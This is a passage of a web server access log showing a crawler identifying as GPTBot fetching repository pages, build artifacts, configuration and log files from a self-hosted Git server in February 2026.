"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:16:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:16:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 74.7.227.38] [Length 10987] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 74.7.227.38] [Length 12196] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:16:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:16:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:16:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:05:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PythonTest/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" -[17/Feb/2026:16:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PythonTest/README.md" -[17/Feb/2026:16:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/.gitignore?display=source" [Client 74.7.227.38] [Length 12239] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" -[17/Feb/2026:16:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" -[17/Feb/2026:16:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py?display=source" [Client 74.7.227.38] [Length 12347] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 74.7.227.38] [Length 11259] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py?display=source" [Client 74.7.227.38] [Length 21546] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" -[17/Feb/2026:16:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:16:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:16:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:16:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:16:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:16:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" -[17/Feb/2026:16:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 26338] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" -[17/Feb/2026:16:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11058] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21749] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21751] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21748] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21748] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21749] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21752] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr 